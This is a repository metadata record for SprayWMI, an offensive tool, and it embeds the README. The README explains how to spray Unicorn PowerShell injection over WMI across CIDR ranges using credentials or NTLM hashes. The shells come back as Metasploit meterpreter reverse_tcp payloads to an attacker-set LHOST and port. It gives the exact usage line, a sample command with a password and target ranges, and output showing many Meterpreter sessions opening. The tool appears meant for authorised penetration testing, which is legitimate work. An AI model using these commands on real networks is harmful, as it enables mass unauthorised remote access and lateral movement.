{"id":13464689,"url":"https://github.com/trustedsec/spraywmi","last_synced_at":"2025-07-08T15:05:42.473Z","repository":{"id":151080785,"uuid":"44243973","full_name":"trustedsec/spraywmi","owner":"trustedsec","description":"SprayWMI is an easy way to get mass shells on systems that support WMI. Much more effective than PSEXEC as it does not leave remnants on a system.","archived":false,"fork":false,"pushed_at":"2015-11-24T15:13:42.000Z","size":1799,"stargazers_count":254,"open_issues_count":3,"forks_count":70,"subscribers_count":23,"default_branch":"master","last_synced_at":"2025-05-10T01:09:07.683Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trustedsec.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG","contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2015-10-14T11:42:06.000Z","updated_at":"2025-04-17T00:47:05.000Z","dependencies_parsed_at":"2023-04-14T01:23:36.812Z","dependency_job_id":null,"html_url":"https://github.com/trustedsec/spraywmi","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/trustedsec/spraywmi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trustedsec","download_url":"https://
codeload.github.com/trustedsec/spraywmi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fspraywmi/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":264292934,"owners_count":23586061,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-31T14:00:48.686Z","updated_at":"2025-07-08T15:05:42.456Z","avatar_url":"https://github.com/trustedsec.png","language":"Python","funding_links":[],"categories":["Python"],"sub_categories":[],"readme":"SprayWMI is a method for mass spraying Unicorn PowerShell injection to CIDR notations.\n\nWritten by: David Kennedy (@HackingDave) @TrustedSec\nSpecial thanks to: Justin Elze and Larry Spohn @TrustedSec\n\nInitial blog post: https://www.trustedsec.com/june-2015/no_psexec_needed/\nIf you have trouble with this on 64-bit, try:\ndpkg --add-architecture i386 \u0026\u0026 apt-get update \u0026\u0026 apt-get install libpam0g:i386 \u0026\u0026 apt-get install libpopt0:i386\n\nFlags and descriptions:\n\ndomain                 Domain you are attacking. If it's local, just specify workgroup.\n\nusername               Username to authenticate on the remote Windows system.\n\npassword               Password or password hash LM:NTLM to use on the remote Windows system.\n\nCIDR range or file     Specify a single IP, CIDR range (10.0.1.1/24) or multiple CIDRs: 10.0.1.1/24,10.0.2.1/24. \n                          You can also specify a file (ex: ips.txt) that contains a single IP address on each line. 
\npayload                Metasploit payload, example: windows/meterpreter/reverse_tcp\n\nLHOST                  Reverse shell IP address.\n\nLPORT                  Reverse shell listening port.\n\noptional: NO           Specify no if you do not want to create a listener. This is useful if you already have a listener \n                          established. If you do not specify a value, it will automatically create a listener for you.\n\nUsage: python spraywmi.py \u003cdomain\u003e \u003cusername\u003e \u003cpassword\u003e \u003cCIDRrange or file\u003e \u003cpayload\u003e \u003cLHOST\u003e \u003cLPORT\u003e \u003coptional: no\u003e\n\n\nBelow is an example of output from spraywmi:\n\nroot@stronghold:/home/relik# python spraywmi.py TS kennedy-test complexP255w0rd! 10.0.90.1/24,10.0.0.1/24,10.0.59.1/24,10.0.96.1/24,10.0.1.1/24 windows/meterpreter/reverse_tcp 10.0.47.24 443\n\n[*] Generating shellcode through Unicorn, this could take a few seconds.\n\n[*] Launching the listener in the background.\n\n[*] Waiting for the listener to start first before we continue.\n\n[*] Be patient, Metasploit takes a little bit to start.\n\n[*] Sweeping targets for open TCP port 135 first, then moving through. Be patient.\n\n[*] Launching WMI spray against IP: 10.0.90.1 - You should have a shell in the background. Once finished, a shell will spawn.\n\n\u003csnip\u003e\n\n[*] Launching WMI spray against IP: 10.0.96.20 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.21 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.22 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.23 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.96.242 - You should have a shell in the background. 
Once finished, a shell will spawn.\n\n[*] Launching WMI spray against IP: 10.0.1.13 - You should have a shell in the background. Once finished, a shell will spawn.\n\n[*] Spraying is still happening in the background, shells should arrive as they complete.\n\n[*] Interacting with Metasploit.\n\nmsf exploit(handler) \u003e \n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.174\n\n[*] Meterpreter session 1 opened (10.0.47.24:443 -\u003e 10.0.90.174:49868) at 2015-10-13 04:33:55 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.203\n\n[*] Meterpreter session 2 opened (10.0.47.24:443 -\u003e 10.0.90.203:51333) at 2015-10-13 04:33:59 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.184\n\n[*] Meterpreter session 3 opened (10.0.47.24:443 -\u003e 10.0.90.184:61218) at 2015-10-13 04:34:02 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.204\n\n[*] Meterpreter session 4 opened (10.0.47.24:443 -\u003e 10.0.90.204:54219) at 2015-10-13 04:34:06 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.175\n\n[*] Meterpreter session 5 opened (10.0.47.24:443 -\u003e 10.0.90.175:54210) at 2015-10-13 04:34:10 -0400\n\n\u003csnip\u003e\n\n[*] Meterpreter session 13 opened (10.0.47.24:443 -\u003e 10.0.90.248:53657) at 2015-10-13 04:34:31 -0400\n\n[*] Encoded stage with x86/shikata_ga_nai\n\n[*] Sending encoded stage (885836 bytes) to 10.0.90.39\n\n[*] Meterpreter session 14 opened (10.0.47.24:443 -\u003e 10.0.90.39:60451) at 2015-10-13 04:34:35 -0400\n\n[*] Encoded stage with 
x86/shikata_ga_nai\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fspraywmi","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrustedsec%2Fspraywmi","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fspraywmi/lists"}